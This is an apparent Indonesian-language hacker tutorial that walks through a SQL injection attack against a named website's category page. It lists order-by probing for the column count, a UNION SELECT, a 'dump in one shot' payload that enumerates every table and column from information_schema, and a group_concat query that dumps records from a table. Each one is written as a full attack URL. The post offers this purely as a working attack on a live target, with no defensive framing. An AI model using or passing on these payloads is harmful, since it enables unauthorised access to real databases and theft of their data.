oke guys ketemu lg neh sama cakil :v
kali ini saya akan kasih tutorial sqli dengan dios (dump in shoot)
langsung ae guys
dork : sini
ok karna saya lg kurang beruntung ga ketemu list admon nya maka saya akan
ngasih tau dump nya sadja oc :v
ok saya anggap lu udah punya target :v
http://smtmax.com/category.php?id=15
lanjut masukan kode order by
+order+by+1--+ <- ga error
+order+by+2--+ <- ga error
dan seterus nya.. dan erorr nya ternyata ada di
+order+by+15--+ (yang berarti column hanya di 14)
oke kita masukan
+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--+ (liat gambar di atas)jadinya akan terlihat seperti inihttp://smtmax.com/category.php?id=15+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--+
dan muncul angka 3 dan kita masukan dios nya :v (select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x) jadi akan seperti ini http://smtmax.com/category.php?id=15+union+select+1,2,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x),4,5,6,7,8,9,10,11,12,13,14--+
disini saya akan mendump id,longname,descs (karna tempat admon nya ga tau :v )
ok masukan
group_concat(id,0x3a,longname,descs)
<- karna saya mendump id,longname dan descs bukan admon ea :v kurang beruntung saya kwkwkwkwk :v nanti akan terlihat column yang kita dump
nanti akan seperti ini
http://smtmax.com/category.php?id=15+union+select+1,2,group_concat(id,0x3a,longname,descs),4,5,6,7,8,9,10,11,12,13,14+from+cms_category--+
nah sudah muncul tuh :v mudah kan ?
ok sekian dan terima kasih :) kalo ada yang ingin di tanya kan silahkan
tanyakan di fp kami
link